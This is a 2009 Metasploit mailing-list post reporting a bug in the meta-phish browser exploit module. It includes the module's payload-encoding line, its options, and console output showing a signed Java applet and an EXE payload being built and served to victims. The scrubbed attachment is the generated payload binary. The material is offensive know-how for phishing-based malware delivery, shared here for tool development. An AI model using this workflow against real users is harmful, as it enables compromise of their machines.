Metasploit mailing list archives
metaphish win32pe corrupt binary
From: reydecopas at gmail.com (reydecopas)
Date: Thu, 13 Aug 2009 21:04:14 +0200
svn At revision 6954.

Metaphish works but the win32exe generated is corrupted.

modules/exploits/windows/browser/meta-phish.rb:

    @msf_payload = Msf::Util::EXE.to_win32pe(framework,payload.encoded)

*******************************************************

Basic options:

  Name             Current Setting                          Required  Description
  ----             ---------------                          --------  -----------
  COMPANY_NAME     MetaPhish LLC.                           yes       Company Name
  COMPANY_WEBSITE  http://carnal0wnage.attackresearch.com/  yes       Company Website
  OUTPUTPATH       /tmp/                                    yes       Working directory location.
  SRVHOST          0.0.0.0                                  yes       The local host to listen on.
  SRVPORT          8080                                     yes       The local port to listen on.
  SSL              false                                    no        Use SSL
  URIPATH                                                   no        The URI to use for this exploit (default is random)

Payload information:
  Space: 8192

Description:
  This module deploys a payload via a signed Java applet.

msf exploit(meta-phish) > exploit
[*] Exploit running as background job.
msf exploit(meta-phish) >
[*] File hCqQQpHf.java created.
[*] File hCqQQpHf.class created.
[*] Store Password = ksHodVRZ
[*] Key Password = OkZjzZtE
[*] Building Keystore....
[*] Keystore metaphish_keystore Built!!
[*] Creating Signed jar file....
[*] Jar hCqQQpHf.jar created.

Warning:
The signer certificate will expire within six months.
[*] Signed Jar shCqQQpHf.jar created.
[*] Added URL: http://0.0.0.0:8080/uJrrejYW.exe
[*] Added URL: http://0.0.0.0:8080/hCqQQpHf.class
[*] Added URL: http://0.0.0.0:8080/shCqQQpHf.jar
[*] Using URL: http://0.0.0.0:8080/4OmVmn2iWaL1IR
[*] Local IP: http://192.168.1.200:8080/4OmVmn2iWaL1IR
[*] Server started.
[*] Sending Applet.
[*] Sending signed jar: shCqQQpHf.jar
[*] Sending signed jar: shCqQQpHf.jar
[*] Sending EXE: /uJrrejYW.exe

*******************************************

binary /uJrrejYW.exe is CORRUPTED

PE import section is corrupted.

binary attached in rar with password corrupted

-------------- next part --------------
A non-text attachment was scrubbed...
Name: uJrrejYW.rar
Type: application/rar
Size: 9396 bytes
Desc: not available
URL: <http://mail.metasploit.com/pipermail/framework/attachments/20090813/7f86f707/attachment.rar>